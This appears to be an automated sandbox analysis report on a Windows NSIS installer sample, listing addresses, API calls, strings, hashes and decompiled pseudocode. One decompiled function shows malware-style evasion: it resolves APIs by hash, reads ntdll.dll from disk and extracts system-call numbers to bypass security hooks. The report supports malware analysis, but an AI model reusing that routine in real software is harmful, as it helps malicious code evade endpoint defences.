0x00403a76
0x00403a78
0x00403a8c
0x00403a9e
0x00403aa5
0x00403aac
0x00403ab2
0x00403ab7
0x00403abd
0x00403ad0
0x00403ad0
0x00403adb
0x00403a7a
0x00403a85
0x00403a85
0x00403ae0
0x00403aea
0x00403af3
0x00403af8
0x00403b09
0x00403b90
0x00403b98
0x00403ba1
0x00403ba1
0x00403bb7
0x00403bbd
0x00403bcb
0x00403c4c
0x00403c54
0x00403c5e
0x00403c63
0x00403c69
0x00403cf3
0x00403cf8
0x00403cfa
0x00403d16
0x00000000
0x00403d16
0x00403cfc
0x00403d02
0x00403d0a
0x00403d0a
0x00000000
0x00403d02
0x00403c77
0x00403c82
0x00403c87
0x00403c89
0x00403c90
0x00403c90
0x00403c9b
0x00403ca3
0x00403ca5
0x00403ca7
0x00403cb0
0x00403cb3
0x00403cb9
0x00403cb9
0x00403cbf
0x00403cd8
0x00403ce9
0x00000000
0x00403cee
0x00403c56
0x00403c58
0x00000000
0x00403bcd
0x00403bcd
0x00403bd9
0x00403be3
0x00403be9
0x00403bee
0x00403bfd
0x00403d1b
0x00403d1b
0x00000000
0x00403d1b
0x00403c0c
0x00403c47
0x00000000
0x00403c47
0x00403b0f
0x00403b0f
0x00403b12
0x00403b14
0x00000000
0x00000000
0x00403b1e
0x00403b2e
0x00403b33
0x00403b3a
0x00000000
0x00000000
0x00403b3e
0x00403b40
0x00403b4d
0x00403b4d
0x00403b55
0x00403b5b
0x00403b83
0x00403b8b
0x00000000
0x00403b6d
0x00403b6e
0x00403b77
0x00403b7d
0x00403b7e
0x00000000
0x00403b7e
0x00403b79
0x00403b7b
0x00000000
0x00000000
0x00000000
0x00403b7b
0x00403b5b

APIs

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,00000000), ref: 00403ADB
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,74B5FA90), ref: 00403B50
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
LoadImageA.USER32 ref: 00403BB7

Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8

RegisterClassA.USER32 ref: 00403BF4
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
CreateWindowExA.USER32 ref: 00403C41
ShowWindow.USER32(00000005,00000000), ref: 00403C77
GetClassInfoA.USER32 ref: 00403CA3
GetClassInfoA.USER32 ref: 00403CB0
RegisterClassA.USER32 ref: 00403CB9
DialogBoxParamA.USER32 ref: 00403CD8

Strings

RichEdit20A, xrefs: 00403C9B, 00403CA1
_Nb, xrefs: 00403BD3, 00403C3B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A65
.DEFAULT\Control Panel\International, xrefs: 00403AC6
1033, xrefs: 00403A80, 00403AD6
.exe, xrefs: 00403B5D
C:\Users\user\AppData\Local\Temp, xrefs: 00403AEA, 00403AF2, 00403B8A, 00403B90, 00403BA0
Call, xrefs: 00403B1E, 00403B26, 00403B33, 00403B7D, 00403B83
RichEd32, xrefs: 00403C8B
Control Panel\Desktop\ResourceLocale, xrefs: 00403A94
B, xrefs: 00403BC6
"C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00403A64
RichEdit, xrefs: 00403CAA
RichEd20, xrefs: 00403C7D

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
API String ID: 1975747703-3767301218
Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}

0x00402eff
0x00402f02
0x00402f1c
0x00402f21
0x00402f34
0x00402f39
0x00402f3f
0x00000000
0x00402f41
0x00402f52
0x00402f63
0x00402f6a
0x00402f72
0x00402f77
0x00402f79
0x00403067
0x00403069
0x00403075
0x00000000
0x00000000
0x0040307e
0x004030aa
0x004030b5
0x004030be
0x004030bf
0x004030c4
0x004030d5
0x004030db
0x004030e1
0x004030e7
0x004030f1
0x0040310c
0x00403115
0x0040311a
0x00403139
0x00403149
0x0040315b
0x00403160
0x00403168
0x00403175
0x0040317d
0x00403182
0x00403184
0x00403184
0x0040318a
0x0040318a
0x0040318d
0x0040318f
0x0040318f
0x00403191
0x00403193
0x00403193
0x0040319d
0x004031a9
0x00000000
0x004031ae
0x00000000
0x00403168
0x00000000
0x0040311c
0x00403086
0x00403098
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f7f
0x00402f7f
0x00402f84
0x00402f88
0x00402f8f
0x00402f96
0x00402f98
0x00402f98
0x00402fa7
0x00403128
0x0040316a
0x00000000
0x0040316a
0x00402fb3
0x00403037
0x0040303a
0x0040303f
0x00000000
0x00403037
0x00402fc0
0x00402fc5
0x00402fcd
0x00402ff3
0x00403002
0x00403008
0x0040300d
0x00403013
0x00000000
0x00000000
0x0040301d
0x00403025
0x00403028
0x0040302d
0x0040302f
0x0040302f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040301d
0x00403040
0x00403046
0x00403056
0x00403056
0x00403059
0x0040305f
0x0040305f
0x00000000
0x00402f7f

APIs

GetTickCount.KERNEL32 ref: 00402F05
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lpdKSOB78u.exe,00000400), ref: 00402F21

Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lpdKSOB78u.exe,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00402F6A
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
Null, xrefs: 00402FEA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
soft, xrefs: 00402FE1
Inst, xrefs: 00402FD8
"C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00402EF1
C:\Users\user\Desktop\lpdKSOB78u.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
Error launching installer, xrefs: 00402F41

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\lpdKSOB78u.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3446583419
Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C

Uniqueness

Uniqueness Score: -1.00%

Function 703C372D, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 237
fileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E703C372D(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E703C45AA();
				_v64 = E703C4652(_v20, 0x8a111d91);
				_v68 = E703C4652(_v20, 0x170c1ca1);
				_v52 = E703C4652(_v20, 0xa5f15738);
				_v72 = E703C4652(_v20, 0x433a3842);
				_v56 = E703C4652(_v20, 0xd6eb2188);
				_v60 = E703C4652(_v20, 0x50a26af);
				_v80 = E703C4652(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E703C47AD(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t213 = _v32;
								_v40 = _v32 + ( *(_v32 + 0x14) & 0x0000ffff) + 0x18;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E703C45C2(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E703C45C2(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E703C4652(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

0x703c3733
0x703c3737
0x703c373b
0x703c3741
0x703c3742
0x703c3748
0x703c3749
0x703c374f
0x703c3750
0x703c3756
0x703c3757
0x703c375d
0x703c375e
0x703c3764
0x703c3765
0x703c376b
0x703c376c
0x703c3772
0x703c3773
0x703c3779
0x703c377a
0x703c3780
0x703c3784
0x703c3788
0x703c378c
0x703c3790
0x703c3790
0x703c3790
0x703c3799
0x703c37a9
0x703c37b9
0x703c37c9
0x703c37d9
0x703c37e9
0x703c37f9
0x703c3809
0x703c380c
0x703c3813
0x703c3832
0x703c3839
0x00000000
0x00000000
0x703c3848
0x703c384b
0x703c384f
0x703c3865
0x703c3868
0x703c386c
0x703c3882
0x703c3885
0x703c3887
0x703c3891
0x703c389d
0x703c38a7
0x703c38ae
0x703c38c3
0x703c38c6
0x703c38ca
0x703c38dd
0x703c38e2
0x703c38ef
0x703c38ef
0x703c38f6
0x703c38f9
0x00000000
0x00000000
0x703c3924
0x703c38eb
0x703c38eb
0x703c38ec
0x703c38ec
0x703c3936
0x703c3939
0x703c393d
0x703c3941
0x703c3945
0x703c394a
0x703c394a
0x703c394d
0x703c3951
0x703c395d
0x703c395d
0x703c3960
0x703c3964
0x703c3966
0x00000000
0x00000000
0x00000000
0x703c393f
0x00000000
0x703c38cc
0x00000000
0x703c3889
0x00000000
0x703c386e
0x00000000
0x703c3851
0x703c396c
0x703c3970
0x703c3976
0x703c397b
0x703c397b
0x703c3980
0x703c3980
0x703c3986
0x703c3989
0x703c3999
0x703c39a3
0x703c39a8
0x703c39c2
0x703c39c7
0x703c39d7
0x703c39d7
0x703c39d8
0x703c39c9
0x703c39cf
0x703c39cf
0x703c39aa
0x703c39b3
0x703c39b7
0x703c39b7
0x00000000
0x00000000
0x703c399b
0x00000000
0x703c3999
0x703c39e1
0x703c39e9
0x703c39f0
0x703c39fc
0x703c39fc
0x703c3a05
0x703c3a05
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,55E38B1F,?,050A26AF,?,D6EB2188,?,433A3842), ref: 703C382F
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 703C39FC

Strings

=4<p, xrefs: 703C372D

Memory Dump Source

Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true

Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileFreeVirtual
String ID: =4<p
API String ID: 204039940-596753135
Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
Instruction ID: 81040a1c5b9ec0b1f69f544e734d2d3e4678380bd83af8e7c43dcdbe024a17bd
Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
Instruction Fuzzy Hash: 31A1D234E00209EFDB01DBE4C985BAEBBB6BF08311F20445AE515FA2A0D7B99E51DF15

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\hardz\AppData\Local\Temp\nsr575.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\hardz\AppData\Local\Temp\nsr575.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x0040177c
0x00401798
0x0040177e
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
